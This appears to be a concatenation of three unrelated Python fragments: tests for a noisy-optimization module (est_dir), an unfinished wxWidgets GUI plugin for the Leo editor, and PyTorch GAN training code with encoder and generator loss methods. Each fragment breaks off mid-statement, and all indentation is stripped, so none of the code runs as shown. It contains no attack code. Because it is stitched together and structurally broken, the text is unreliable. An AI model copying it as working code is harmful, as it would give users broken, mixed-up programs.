assert(np.where(fp_norms[0] == fp_norms[1])[0].shape[0] !=
num_funcs)
assert(np.where(fp_func_vals[0] == fp_func_vals[1])[0].shape[0] !=
num_funcs)
assert(np.where(func_evals_step[0] == func_evals_step[1])[0].shape[0] !=
num_funcs)
assert(np.where(func_evals_dir[0] == func_evals_dir[1])[0].shape[0] !=
num_funcs)
assert(np.where(good_dir_norm[0] == good_dir_norm[1])[0].shape[0] !=
num_funcs)
assert(np.where(good_dir_func[0] == good_dir_func[1])[0].shape[0] !=
num_funcs)
assert(np.where(time_taken[0] == time_taken[1])[0].shape[0] !=
num_funcs)
assert(np.all(sp_norms[0] == sp_norms[1]))
assert(np.all(sp_func_vals[0] == sp_func_vals[1]))
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
test_sp_norms = np.zeros((noise_list.shape[0], num_funcs))
test_fp_norms = np.zeros((noise_list.shape[0], num_funcs))
test_sp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
test_fp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
test_sp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
test_fp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
test_time_taken = np.zeros((noise_list.shape[0], num_funcs))
test_func_evals_step = np.zeros((noise_list.shape[0], num_funcs))
test_func_evals_dir = np.zeros((noise_list.shape[0], num_funcs))
test_no_its = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_no_its_prop = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_norm = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_func = np.zeros((noise_list.shape[0], num_funcs))
for index_noise in range(noise_list.shape[0]):
max_func_evals = max_func_evals_list[index_noise]
for j in range(num_funcs):
noise_sd = noise_list[index_noise]
seed = j * 50
np.random.seed(seed)
centre_point = np.random.multivariate_normal(np.zeros((m)), cov)
minimizer = np.zeros((m, ))
matrix = est_dir.quad_func_params(1, lambda_max, m)
test_sp_norms[index_noise, j] = np.linalg.norm(minimizer -
centre_point)
test_sp_func_vals[index_noise, j] = est_dir.quad_f(centre_point,
minimizer,
matrix)
func_args = (minimizer, matrix, 0, noise_sd)
func_args_no_noise = (minimizer, matrix)
np.random.seed(seed + 1)
(upd_point_XY,
test_sp_func_vals_noise[index_noise, j],
test_fp_func_vals_noise[index_noise, j],
test_time_taken[index_noise, j],
test_func_evals_step[index_noise, j],
test_func_evals_dir[index_noise, j],
test_no_its[index_noise, j],
store_good_dir,
store_good_dir_norm,
store_good_dir_func) = (est_dir.calc_its_until_sc_XY(
centre_point, f, func_args, n, m,
f_no_noise, func_args_no_noise,
no_vars, region, max_func_evals))
test_fp_norms[index_noise, j] = np.linalg.norm(minimizer -
upd_point_XY)
test_fp_func_vals[index_noise, j] = est_dir.quad_f(upd_point_XY,
minimizer,
matrix)
test_good_dir_no_its_prop[index_noise, j] = store_good_dir
if len(store_good_dir_norm) > 0:
test_good_dir_norm[index_noise,
j] = np.mean(store_good_dir_norm)
test_good_dir_func[index_noise,
j] = np.mean(store_good_dir_func)
assert(np.all(test_sp_norms == sp_norms))
assert(np.all(test_sp_func_vals == sp_func_vals))
assert(np.all(test_sp_func_vals_noise == sp_func_vals_noise))
assert(np.all(test_fp_func_vals_noise == fp_func_vals_noise))
assert(np.all(test_func_evals_step == func_evals_step))
assert(np.all(test_func_evals_dir == func_evals_dir))
assert(np.all(test_fp_norms == fp_norms))
assert(np.all(test_fp_func_vals == fp_func_vals))
assert(np.all(test_good_dir_no_its_prop == good_dir_no_its_prop))
assert(np.all(test_good_dir_norm == good_dir_norm))
assert(np.all(test_good_dir_func == good_dir_func))
def test_3():
"""
Test for num_exp_SNR_MP().
"""
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
function_type = 'quad'
m = 100
n = 16
lambda_max = 1
noise_list = np.array([1, 2])
max_func_evals_list = np.array([2000, 2000])
store_max_func_evals = max_func_evals_list[0]
no_vars = m
region = 0.1
num_funcs = 5
cov = np.identity(m)
(sp_norms, sp_func_vals,
fp_norms, fp_func_vals,
sp_func_vals_noise,
fp_func_vals_noise,
time_taken, func_evals_step,
func_evals_dir, no_its,
good_dir_no_its_prop,
good_dir_norm,
good_dir_func) = est_dir.num_exp_SNR_MP(f, f_no_noise, n, m, num_funcs,
lambda_max, cov, noise_list,
no_vars, region,
max_func_evals_list,
function_type,
store_max_func_evals)
assert(np.all(sp_norms > 0))
assert(np.all(sp_func_vals > 0))
assert(np.all(fp_norms > 0))
assert(np.all(fp_func_vals > 0))
assert(np.all(func_evals_step > 0))
assert(np.all(func_evals_dir > 0))
assert(np.all(time_taken > 0))
assert(np.all(no_its > 0))
assert(np.where(fp_norms[0] == fp_norms[1])[0].shape[0] !=
num_funcs)
assert(np.where(fp_func_vals[0] == fp_func_vals[1])[0].shape[0] !=
num_funcs)
assert(np.where(func_evals_step[0] == func_evals_step[1])[0].shape[0] !=
num_funcs)
assert(np.where(func_evals_dir[0] == func_evals_dir[1])[0].shape[0] !=
num_funcs)
assert(np.where(good_dir_norm[0] == good_dir_norm[1])[0].shape[0] !=
num_funcs)
assert(np.where(good_dir_func[0] == good_dir_func[1])[0].shape[0] !=
num_funcs)
assert(np.where(time_taken[0] == time_taken[1])[0].shape[0] !=
num_funcs)
assert(np.all(sp_norms[0] == sp_norms[1]))
assert(np.all(sp_func_vals[0] == sp_func_vals[1]))
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
test_sp_norms = np.zeros((noise_list.shape[0], num_funcs))
test_fp_norms = np.zeros((noise_list.shape[0], num_funcs))
test_sp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
test_fp_func_vals_noise = np.zeros((noise_list.shape[0], num_funcs))
test_sp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
test_fp_func_vals = np.zeros((noise_list.shape[0], num_funcs))
test_time_taken = np.zeros((noise_list.shape[0], num_funcs))
test_func_evals_step = np.zeros((noise_list.shape[0], num_funcs))
test_func_evals_dir = np.zeros((noise_list.shape[0], num_funcs))
test_no_its = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_no_its_prop = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_norm = np.zeros((noise_list.shape[0], num_funcs))
test_good_dir_func = np.zeros((noise_list.shape[0], num_funcs))
for index_noise in range(noise_list.shape[0]):
max_func_evals = max_func_evals_list[index_noise]
for j in range(num_funcs):
noise_sd = noise_list[index_noise]
seed = j * 50
np.random.seed(seed)
centre_point = np.random.multivariate_normal(np.zeros((m)), cov)
minimizer = np.zeros((m, ))
matrix = est_dir.quad_func_params(1, lambda_max, m)
test_sp_norms[index_noise, j] = np.linalg.norm(minimizer -
centre_point)
test_sp_func_vals[index_noise, j] = est_dir.quad_f(centre_point,
minimizer,
matrix)
func_args = (minimizer, matrix, 0, noise_sd)
func_args_no_noise = (minimizer, matrix)
np.random.seed(seed + 1)
(upd_point_MP,
test_sp_func_vals_noise[index_noise, j],
test_fp_func_vals_noise[index_noise, j],
test_time_taken[index_noise, j],
test_func_evals_step[index_noise, j],
test_func_evals_dir[index_noise, j],
test_no_its[index_noise, j],
store_good_dir,
store_good_dir_norm,
store_good_dir_func) = (est_dir.calc_its_until_sc_MP(
centre_point, f, func_args, n, m,
f_no_noise, func_args_no_noise,
no_vars, region, max_func_evals))
test_fp_norms[index_noise, j] = np.linalg.norm(minimizer -
upd_point_MP)
test_fp_func_vals[index_noise, j] = est_dir.quad_f(upd_point_MP,
minimizer,
matrix)
test_good_dir_no_its_prop[index_noise, j] = store_good_dir
if len(store_good_dir_norm) > 0:
test_good_dir_norm[index_noise,
j] = np.mean(store_good_dir_norm)
test_good_dir_func[index_noise,
j] = np.mean(store_good_dir_func)
assert(np.all(test_sp_norms == sp_norms))
assert(np.all(test_sp_func_vals == sp_func_vals))
assert(np.all(test_sp_func_vals_noise == sp_func_vals_noise))
assert(np.all(test_fp_func_vals_noise == fp_func_vals_noise))
assert(np.all(test_func_evals_step == func_evals_step))
assert(np.all(test_func_evals_dir == func_evals_dir))
assert(np.all(test_fp_norms == fp_norms))
assert(np.all(test_fp_func_vals == fp_func_vals))
assert(np.all(test_good_dir_no_its_prop == good_dir_no_its_prop))
assert(np.all(test_good_dir_norm == good_dir_norm))
assert(np.all(test_good_dir_func == good_dir_func))
def test_4():
"""
Test for calc_initial_func_values() and compute_var_quad_form()
with region = 1.
"""
f_no_noise = est_dir.quad_f
m = 100
lambda_max = 1
cov = np.identity(m)
num_funcs = 100
snr_list = [0.5, 0.75, 1, 2]
region = 1
sp_func_vals = (est_dir.calc_initial_func_values(
m, num_funcs, lambda_max, cov, f_no_noise))
assert(sp_func_vals.shape == (num_funcs, ))
assert(np.all(sp_func_vals > 0))
noise_list = est_dir.compute_var_quad_form(snr_list, sp_func_vals,
region)
for k in range(noise_list.shape[0]):
assert(np.all(np.round(np.var(sp_func_vals * region) /
(noise_list**2), 6)[k] ==
np.round(snr_list[k], 6)))
def test_5():
"""
Test for calc_initial_func_values() and compute_var_quad_form()
with region = 0.1.
"""
f_no_noise = est_dir.quad_f
m = 100
lambda_max = 1
cov = np.identity(m)
num_funcs = 100
snr_list = [0.5, 0.75, 1, 2]
region = 0.1
sp_func_vals = (est_dir.calc_initial_func_values(
m, num_funcs, lambda_max, cov, f_no_noise))
assert(sp_func_vals.shape == (num_funcs, ))
assert(np.all(sp_func_vals > 0))
noise_list = est_dir.compute_var_quad_form(snr_list, sp_func_vals,
region)
for k in range(noise_list.shape[0]):
assert(np.all(np.round(np.var(sp_func_vals * region) /
(noise_list**2), 6)[k] ==
np.round(snr_list[k], 6)))
def test_6():
"""
Test for quad_LS_XY_MP() with store_max_func_evals=False.
"""
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
function_type = 'quad'
m = 100
n = 16
lambda_max = 1
num_funcs = 5
cov = np.identity(m)
no_vars = m
snr_list = [0.5, 0.75, 1, 2]
region = 0.1
store_max_func_evals = None
sp_func_vals = (est_dir.calc_initial_func_values(
m, num_funcs, lambda_max, cov, f_no_noise))
noise_list = est_dir.compute_var_quad_form(snr_list,
sp_func_vals, region)
est_dir.quad_LS_XY_MP(f, f_no_noise, n, m, num_funcs, lambda_max, cov,
noise_list, no_vars, region, function_type,
store_max_func_evals)
def test_7():
"""
Test for quad_LS_XY_MP() with
store_max_func_evals = [1000, 1000, 2000, 2000].
"""
f = est_dir.quad_f_noise
f_no_noise = est_dir.quad_f
function_type = 'quad'
m = 100
n = 16
lambda_max = 1
num_funcs = 5
cov = np.identity(m)
no_vars = m
snr_list = [0.5, 0.75, 1, 2]
region = 0.1
store_max_func_evals = [1000, 1000, 2000, 2000]
sp_func_vals = (est_dir.calc_initial_func_values(
m, num_funcs, lambda_max, | |
<gh_stars>1000+
# -*- coding: utf-8 -*-
#@+leo-ver=5-thin
#@+node:ekr.20090126093408.1: * @file ./obsolete/wxGui.py
#@@first
'''A plugin to use wxWidgets as Leo's gui.
**Important**: this plugin is largely unfinished.
Do not use thi plugin for production work!
See the "bug list & to-do" section for more details.
'''
__version__ = '0.1'
#@+<< version history >>
#@+node:ekr.20090126093408.2: ** << version history >>
#@@nocolor
#@+at
#
# 0.1 EKR: Based on version 0.7.2 of __wx_gui.py.
#@-<< version history >>
#@+<< bug list & to-do >>
#@+node:ekr.20090126093408.3: ** << bug list & to-do >>
#@@nocolor
#@+at
#
# First:
# * Arrow keys do not work
# - Add dummy transaction so ctrl-v works initially.
# - Don't redraw the entire screen to add/remove text box in the icon.
# - Add color to Log pane text.
# - Get aspell working: use g.pdb to trace aspell startup logic.
#
# Bug list: (All unit tests pass on XP, 4 failures & 2 errors on Linux).
#
# * Autocompletion does not work.
# * Multiple body editors do not work, and crash unit tests in Linux.
# - Completion tab is too small (XP only).
# - The Spell tab functional is empty, and aspell is not imported properly.
#
# Later:
# - Change background of the tree pane when it has focus.
# - Convert Tk color names to rgb values.
# - Convert Tk font names to wx font names?
# - Support user-colorizer in the stc.
#@-<< bug list & to-do >>
#@+<< imports >>
#@+node:ekr.20090126093408.4: ** << imports >>
import leo.core.leoGlobals as g
import leo.core.leoPlugins as leoPlugins
import leo.core.leoColor as leoColor
import leo.core.leoCommands as leoCommands
import leo.core.leoFind as leoFind
import leo.core.leoFrame as leoFrame
import leo.core.leoGui as leoGui
import leo.core.leoKeys as leoKeys
import leo.core.leoMenu as leoMenu
import leo.core.leoNodes as leoNodes
import leo.core.leoUndo as leoUndo
import leo.plugins.baseNativeTree as baseNativeTree
import os
import string
import sys
import traceback
try:
import wx
import wx.lib
import wx.lib.colourdb
except ImportError:
wx = None
g.es_print('wx_gui plugin: can not import wxWidgets')
try:
import wx.richtext as richtext
except ImportError:
richtext = None
try:
import wx.stc as stc
except ImportError:
stc = None
#@-<< imports >>
#@+others
#@+node:ekr.20090126093408.5: ** Module level
#@+others
#@+node:ekr.20090126093408.6: *3* init
def init ():
if not wx: return False
aList = wx.version().split('.')
v1,v2 = aList[0],aList[1]
if not g.CheckVersion ('%s.%s' % (v1,v2),'2.8'):
g.es_print('wx_gui plugin requires wxPython 2.8 or later')
return False
ok = wx and not g.app.gui and not g.app.unitTesting # Not Ok for unit testing!
if ok:
g.app.gui = wxGui()
g.app.root = g.app.gui.createRootWindow()
g.app.gui.finishCreate()
g.plugin_signon(__name__)
elif g.app.gui and not g.app.unitTesting:
s = "Can't install wxPython gui: previous gui installed"
g.es_print(s,color="red")
return ok
#@+node:ekr.20090126093408.7: *3* name2color
def name2color (name,default='white'):
# A hack: these names are *not* part of the color list!
if name in wx.GetApp().leo_colors:
return name
for z in (name,name.upper()):
for name2,r2,g2,b2 in wx.lib.colourdb.getColourInfoList():
if z == name2:
return wx.Colour(r2,g2,b2)
g.trace('color name not found',name)
return default
#@-others
#@+node:ekr.20090126093408.858: ** Frame and component classes
#@+node:ekr.20090126093408.8: *3* Find/Spell classes
#@+node:ekr.20090126093408.9: *4* wxSearchWidget
class wxSearchWidget:
"""A dummy widget class to pass to Leo's core find code."""
#@+others
#@+node:ekr.20090126093408.10: *5* wxSearchWidget.__init__
def __init__ (self):
self.insertPoint = 0
self.selection = 0,0
self.bodyCtrl = self
self.body = self
self.text = None
#@-others
#@+node:ekr.20090126093408.13: *4* wxFindFrame class
class wxFindFrame (wx.Frame,leoFind.leoFind):
#@+others
#@+node:ekr.20090126093408.14: *5* FindFrame.__init__
def __init__ (self,c):
# Init the base classes
wx.Frame.__init__(self,None,-1,"Leo Find/Change",
wx.Point(50,50), wx.DefaultSize,
wx.MINIMIZE_BOX | wx.THICK_FRAME | wx.SYSTEM_MENU | wx.CAPTION)
# At present this is a global window, so the c param doesn't make sense.
# This must be changed to match how Leo presently works.
leoFind.leoFind.__init__(self,c)
self.dict = {} # For communication between panel and frame.
self.findPanel = wxFindPanel(self)
self.s_text = wxSearchWidget() # Working text widget.
#@+<< resize the frame to fit the panel >>
#@+node:ekr.20090126093408.15: *6* << resize the frame to fit the panel >>
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.findPanel)
self.SetAutoLayout(True)# tell dialog to use sizer
self.SetSizer(sizer) # actually set the sizer
sizer.Fit(self)# set size to minimum size as calculated by the sizer
sizer.SetSizeHints(self)# set size hints to honour mininum size
#@-<< resize the frame to fit the panel >>
# Set the window icon.
if wx.Platform == '__WXMSW__':
pass ## self.SetIcon(wx.Icon("LeoIcon"))
# Set the focus.
self.findPanel.findText.SetFocus()
#@+<< define event handlers >>
#@+node:ekr.20090126093408.16: *6* << define event handlers >>
wx.EVT_CLOSE(self,self.onCloseFindFrame)
#@+<< create event handlers for buttons >>
#@+node:ekr.20090126093408.17: *7* << create event handlers for buttons >>
for name,command in (
("changeButton",self.changeButton),
("changeAllButton",self.changeAllButton),
("changeThenFindButton",self.changeThenFindButton),
("findButton",self.findButton),
("findAllButton",self.findAllButton)):
def eventHandler(event,command=command):
# g.trace(command)
command()
id = const_dict.get(name)
assert(id)
wx.EVT_BUTTON(self,id,eventHandler)
#@-<< create event handlers for buttons >>
#@+<< create event handlers for check boxes and text >>
#@+node:ekr.20090126093408.18: *7* << create event handlers for check boxes and text >>
textKeys = ["find_text","change_text"]
keys = textKeys[:]
for item in self.intKeys:
keys.append(item)
for name in keys:
if name not in textKeys:
name += "_flag"
def eventHandler(event,self=self,name=name):
box = event.GetEventObject()
val = box.GetValue()
# g.trace(name,val)
setattr(self.c,name,val)
id = const_dict.get(name)
if id:
if name in textKeys:
wx.EVT_TEXT(self,id,eventHandler)
else:
wx.EVT_CHECKBOX(self,id,eventHandler)
#@-<< create event handlers for check boxes and text >>
#@-<< define event handlers >>
#@+node:ekr.20090126093408.19: *5* bringToFront
def bringToFront (self):
g.app.gui.bringToFront(self)
self.init(self.c)
self.findPanel.findText.SetFocus()
self.findPanel.findText.SetSelection(-1,-1)
#@+node:ekr.20090126093408.20: *5* destroySelf
def destroySelf (self):
self.Destroy()
#@+node:ekr.20090126093408.21: *5* onCloseFindFrame
def onCloseFindFrame (self,event):
if event.CanVeto():
event.Veto()
self.Hide()
#@+node:ekr.20090126093408.22: *5* set_ivars
def set_ivars (self,c):
"""Init the commander ivars from the find panel."""
# N.B.: separate c.ivars are much more convenient than a dict.
for key in self.intKeys:
key = key + "_flag"
data = self.dict.get(key)
if data:
box,id = data
val = box.GetValue()
#g.trace(key,val)
setattr(c,key,val)
else:
#g.trace("no data",key)
setattr(c,key,False)
fp = self.findPanel
c.find_text = fp.findText.GetValue()
c.change_text = fp.changeText.GetValue()
#@+node:ekr.20090126093408.23: *5* init_s_ctrl
def init_s_ctrl (self,s):
c = self.c
t = self.s_text # the dummy widget
# Set the text for searching.
t.text = s
# Set the insertion point.
if c.reverse_flag:
t.SetInsertionPointEnd()
else:
t.SetInsertionPoint(0)
return t
#@+node:ekr.20090126093408.25: *5* init
def init (self,c):
"""Init the find panel from c.
(The opposite of set_ivars)."""
# N.B.: separate c.ivars are much more convenient than a dict.
for key in self.intKeys:
key = key + "_flag"
val = getattr(c,key)
data = self.dict.get(key)
if data:
box,id = data
box.SetValue(val)
# g.trace(key,repr(val))
self.findPanel.findText.SetValue(c.find_text)
self.findPanel.changeText.SetValue(c.change_text)
#@-others
#@+node:ekr.20090126093408.26: *4* wxFindPanel class
class wxFindPanel (wx.Panel):
#@+others
#@+node:ekr.20090126093408.27: *5* FindPanel.__init__
def __init__(self,frame):
g.trace('wxFindPanel not ready yet')
return
# Init the base class.
wx.Panel.__init__(self,frame,-1)
self.frame = frame
topSizer = wx.BoxSizer(wx.VERTICAL)
topSizer.Add(0,10)
#@+<< Create the find text box >>
#@+node:ekr.20090126093408.28: *6* << Create the find text box >>
findSizer = wx.BoxSizer(wx.HORIZONTAL)
findSizer.Add(5,5)# Extra space.
# Label.
findSizer.Add(
wx.StaticText(self,-1,"Find:",
wx.Point(-1,10), wx.Size(50,25),0,""),
0, wx.BORDER | wx.TOP,15) # Vertical offset.
findSizer.Add(10,0) # Width.
# Text.
self.findText = plainTextWidget (self.c,self,-1,"",
wx.DefaultPosition, wx.Size(500,60),
wx.TE_PROCESS_TAB | wx.TE_MULTILINE,
wx.DefaultValidator,"")
findSizer.Add(self.findText.widget)
findSizer.Add(5,0)# Width.
topSizer.Add(findSizer)
topSizer.Add(0,10)
self.frame.dict["find_text"] = self.findText,id
#@-<< Create the find text box >>
#@+<< Create the change text box >>
#@+node:ekr.20090126093408.29: *6* << Create the change text box >>
changeSizer = wx.BoxSizer(wx.HORIZONTAL)
changeSizer.Add(5,5)# Extra space.
# Label.
changeSizer.Add(
wx.StaticText(self,-1,"Change:",
wx.Point(-1,10),wx.Size(50,25),0,""),
0, wx.BORDER | wx.TOP,15)# Vertical offset.
changeSizer.Add(10,0) # Width.
# Text.
self.changeText = plainTextWidget (self.c,self,-1,"",
wx.DefaultPosition, wx.Size(500,60),
wx.TE_PROCESS_TAB | wx.TE_MULTILINE,
wx.DefaultValidator,"")
changeSizer.Add(self.changeText.widget)
changeSizer.Add(5,0)# Width.
topSizer.Add(changeSizer)
topSizer.Add(0,10)
self.frame.dict["change_text"] = self.findText,id
#@-<< Create the change text box >>
#@+<< Create all the find check boxes >>
#@+node:ekr.20090126093408.30: *6* << Create all the find check boxes >>
col1Sizer = wx.BoxSizer(wx.VERTICAL)
#@+<< Create the first column of widgets >>
#@+node:ekr.20090126093408.31: *7* << Create the first column of widgets >>
# The var names must match the names in leoFind class.
table = (
("plain-search-flag","Plain Search",wx.RB_GROUP),
("pattern_match_flag","Pattern Match",0),
("script_search_flag","Script Search",0))
for var,label,style in table:
id = wx.NewId()
box = wx.RadioButton(self,id,label,
wx.DefaultPosition,(100,25),
style,wx.DefaultValidator,"group1")
if style == wx.RB_GROUP:
box.SetValue(True) # The default entry.
col1Sizer.Add(box,0,wx.BORDER | wx.LEFT,60)
self.frame.dict[var] = box,id
table = (("script_change_flag","Script Change"),)
for var,label in table:
id = wx.NewId()
box = wx.CheckBox(self,id,label,
wx.DefaultPosition,(100,25),
0,wx.DefaultValidator,"")
col1Sizer.Add(box,0,wx.BORDER | wx.LEFT,60)
self.frame.dict[var] = box,id
#@-<< Create the first column of widgets >>
col2Sizer = wx.BoxSizer(wx.VERTICAL)
#@+<< Create the second column of widgets >>
#@+node:ekr.20090126093408.32: *7* << Create the second column of widgets >>
# The var names must match the names in leoFind class.
table = (
("whole_word_flag","Whole Word"),
("ignore_case_flag","Ignore Case"),
("wrap_flag","Wrap Around"),
("reverse_flag","Reverse"))
for var,label in table:
id = wx.NewId()
box = wx.CheckBox(self,id,label,
wx.DefaultPosition,(100,25),
0,wx.DefaultValidator,"")
col2Sizer.Add(box,0,wx.BORDER | wx.LEFT,20)
self.frame.dict[var] = box,id
#@-<< Create the second column of widgets >>
col3Sizer = wx.BoxSizer(wx.VERTICAL)
#@+<< Create the third column of widgets | |
"""
Update encoders (e_c, e_a) and generator weights - accumulate losses, backward
:param opts:
:return:
"""
# update G, Ec, Ea - update with real images
self.opts = opts
self.enc_c_opt.zero_grad()
self.enc_a_opt.zero_grad()
self.gen_opt.zero_grad()
self.backward_EG()
# update G - generator loss on fake generated images
self.backward_G_alone()
self.enc_c_opt.step()
self.enc_a_opt.step()
self.gen_opt.step()
def backward_EG(self):
"""
Accumulate all losses on real images for econders (e_a, e_c) and generator, backward
:return:
"""
# self recon
loss_G = torch.mean(
torch.abs(self.input - torch.cat((self.fake_AA_encoded, self.fake_BB_encoded), 0))) * self.opts.lambda_rec
self.l1_self_rec_loss = loss_G.item()
# l2 recon + cyclic
if self.opts.lambda_l2_rec > 0:
l2_self_rec_loss = self.l2_loss(self.input, torch.cat((self.fake_AA_encoded, self.fake_BB_encoded), 0)) * self.opts.lambda_l2_rec
self.l2_self_rec_loss = l2_self_rec_loss.item()
loss_G += l2_self_rec_loss
if self.opts.lambda_l2_rec_cc > 0:
l2_cc_rec_loss = self.l2_loss(self.input, torch.cat((self.fake_A_recon, self.fake_B_recon), 0)) * self.opts.lambda_l2_rec_cc
self.l2_cc_rec_loss = l2_cc_rec_loss.item()
loss_G += l2_cc_rec_loss
# content loss
loss_E_content = self.backward_E_content(self.z_content)
loss_G += loss_E_content
self.E_content_loss = loss_E_content.item()
# discriminator loss
pred_fake, pred_fake_cls = self.dis1.forward(self.fake_encoded_img)
loss_G_GAN = 0
for out_a in pred_fake:
outputs_fake = torch.sigmoid(out_a)
all_ones = torch.ones_like(outputs_fake).to(self.device)
loss_G_GAN += nn.functional.binary_cross_entropy(outputs_fake, all_ones)
loss_G_gan = loss_G_GAN * self.opts.lambda_G_gan
self.G_gan_loss = loss_G_gan.item()
loss_G += loss_G_gan
# classification
loss_G_cls = self.cls_loss(pred_fake_cls, self.c_org) * self.opts.lambda_cls_G
self.G_gan_cls_loss = loss_G_cls.item()
loss_G += loss_G_cls
#cross-cycle recon
loss_G_L1_cc = torch.mean(
torch.abs(self.input - torch.cat((self.fake_A_recon, self.fake_B_recon), 0))) * self.opts.lambda_rec_cc
loss_G += loss_G_L1_cc
self.l1_cc_rec_loss = loss_G_L1_cc.item()
# KL loss - z_c
loss_kl_zc = self._l2_regularize(self.z_content) * self.opts.lambda_kl_zc
# KL loss - z_a
kl_element = self.mu.pow(2).add_(self.logvar.exp()).mul_(-1).add_(1).add_(self.logvar)
loss_kl_za = torch.sum(kl_element).mul_(-0.5) * self.opts.lambda_kl_za
self.kl_loss_zc = loss_kl_zc.item()
self.kl_loss_za = loss_kl_za.item()
loss_G += loss_kl_zc + loss_kl_za
# classification loss on the attribute latent space
loss_E_cls_self = self.cls_loss(self.E_pred_cls, self.c_org) * self.opts.lambda_cls_E
self.E_cls_self_loss = loss_E_cls_self.item()
# regression loss on E_a
if self.opts.regression:
loss_E_reg_self = self.reg_loss(self.E_pred_reg, self.c_reg) * self.opts.lambda_cls_E
self.E_reg_self_loss = loss_E_reg_self.item()
loss_E_cls_self += loss_E_reg_self
self.E_cls_loss = loss_E_cls_self.item()
loss_G += loss_E_cls_self
# feature attribution map loss
if self.opts.loss_diff_M:
diff_M_reg_loss = torch.abs(torch.cat((self.diff_fake_A_encoded,
self.diff_fake_B_encoded),0)).mean() * self.opts.lambda_diff_M_reg
self.diff_M_loss = diff_M_reg_loss.item()
loss_G += diff_M_reg_loss
# retain graph for backward_G_alone
loss_G.backward(retain_graph=True)
self.G_loss = loss_G.item()
def backward_E_content(self, z_content):
"""
Content encoder (E_c) losses using the content discriminator
:param z_content: content latent vector
:return:
"""
# Update encoder to fool discriminator
pred_cls = self.disContent.forward(z_content, mode='cls')
if not (self.opts.D_content_dis_cls_all1 == 0):
# the goal is to learn all classes == 0.5
all1 = self.opts.D_content_dis_cls_all1 * torch.ones_like(self.c_org).to(self.device)
loss_E_content = self.cls_loss(pred_cls, all1) * self.opts.lambda_E_content_cls
else:
# the goal is to fool discriminator- i.e. reverse the classes
loss_E_content = self.cls_loss(pred_cls, 1 - self.c_org) * self.opts.lambda_E_content_cls
return loss_E_content
def backward_G_alone(self):
"""
Accumulate all losses on fake images for generator, backward
:return:
"""
pred_fake, pred_fake_cls = self.dis2.forward(self.fake_random_img)
loss_G_GAN2 = 0
for out_a in pred_fake:
outputs_fake = torch.sigmoid(out_a)
all_ones = torch.ones_like(outputs_fake).to(self.device)
loss_G_GAN2 += nn.functional.binary_cross_entropy(outputs_fake, all_ones)
# classification
loss_G_cls2 = self.cls_loss(pred_fake_cls, self.c_org) * self.opts.lambda_cls_G
self.G_gan2_cls_loss = loss_G_cls2.item()
loss_G_GAN2 = self.opts.lambda_G_gan * loss_G_GAN2
loss_G = loss_G_GAN2 + loss_G_cls2
self.G_gan2_loss = loss_G_GAN2.item()
self.G_gan2_cls_loss = loss_G_cls2.item()
# latent regression loss
if self.opts.loss_latent_l1_random:
loss_z_L1_a = torch.mean(torch.abs(self.mu2_a - self.z_random_a)) * self.opts.lambda_latent_l1
loss_z_L1_b = torch.mean(torch.abs(self.mu2_b - self.z_random_b)) * self.opts.lambda_latent_l1
self.l1_recon_random_z_loss = loss_z_L1_a.item() + loss_z_L1_b.item()
loss_z_L1 = loss_z_L1_a + loss_z_L1_b
loss = loss_G + loss_z_L1
loss.backward()
else:
loss_G.backward()
def _l2_regularize(self, mu):
"""
l2 regularization on weights
:param mu:
:return:
"""
mu_2 = torch.pow(mu, 2)
encoding_loss = torch.mean(mu_2)
return encoding_loss
def assemble_outputs(self):
"""
Assesmble images to be saved for 2D data
:return:
"""
images_a = (self.real_A).detach()
images_b = (self.real_B).detach()
images_a1 = (self.fake_B_encoded).detach()
images_a2 = (self.fake_B_random).detach()
images_a3 = (self.diff_fake_B_encoded).detach()
images_a4 = (self.fake_AA_encoded).detach()
images_a5 = (self.fake_A_recon).detach()
images_b1 = (self.fake_A_encoded).detach()
images_b2 = (self.fake_A_random).detach()
images_b3 = (self.diff_fake_A_encoded).detach()
images_b4 = (self.fake_BB_encoded).detach()
images_b5 = (self.fake_B_recon).detach()
if not self.mask is None:
mask_a = (self.mask_a.unsqueeze(0)).detach()
mask_b = (self.mask_b.unsqueeze(0)).detach()
row1 = torch.cat(
(images_a[0:1, ::], mask_a[0:1, ::], images_a1[0:1, ::], images_a2[0:1, ::], images_a3[0:1, ::], images_a4[0:1, ::], images_a5[0:1, ::]), 3)
row2 = torch.cat(
(images_b[0:1, ::], mask_b[0:1, ::], images_b1[0:1, ::], images_b2[0:1, ::], images_b3[0:1, ::], images_b4[0:1, ::], images_b5[0:1, ::]), 3)
else:
row1 = torch.cat(
(images_a[0:1, ::], images_a1[0:1, ::], images_a2[0:1, ::], images_a3[0:1, ::], images_a4[0:1, ::], images_a5[0:1, ::]), 3)
row2 = torch.cat(
(images_b[0:1, ::], images_b1[0:1, ::], images_b2[0:1, ::], images_b3[0:1, ::], images_b4[0:1, ::], images_b5[0:1, ::]), 3)
attr_row = None
images_a_content = torch.mean(self.z_content_a, dim=1, keepdim=True)
images_b_content = torch.mean(self.z_content_b, dim=1, keepdim=True)
content_row = torch.cat((images_a_content[0:1, ::], images_b_content[0:1, ::]), 3)
return torch.cat((row1, row2), 2), content_row, attr_row
def assemble_outputs_3d(self):
"""
Assesmble images to be saved for 3D data
:return:
"""
images_a = self._normalize_image(self.real_A).detach().cpu().numpy()[0, 0, ::]
images_b = self._normalize_image(self.real_B).detach().cpu().numpy()[0, 0, ::]
images_a1 = self._normalize_image(self.fake_AA_encoded).detach().cpu().numpy()[0, 0, ::]
images_b1 = self._normalize_image(self.fake_BB_encoded).detach().cpu().numpy()[0, 0, ::]
images_a_clc = self._normalize_image(self.fake_A_recon).detach().cpu().numpy()[0, 0, ::]
images_b_clc = self._normalize_image(self.fake_B_recon).detach().cpu().numpy()[0, 0, ::]
images_a_random = self._normalize_image(self.fake_B_random).detach().cpu().numpy()[0, 0, ::]
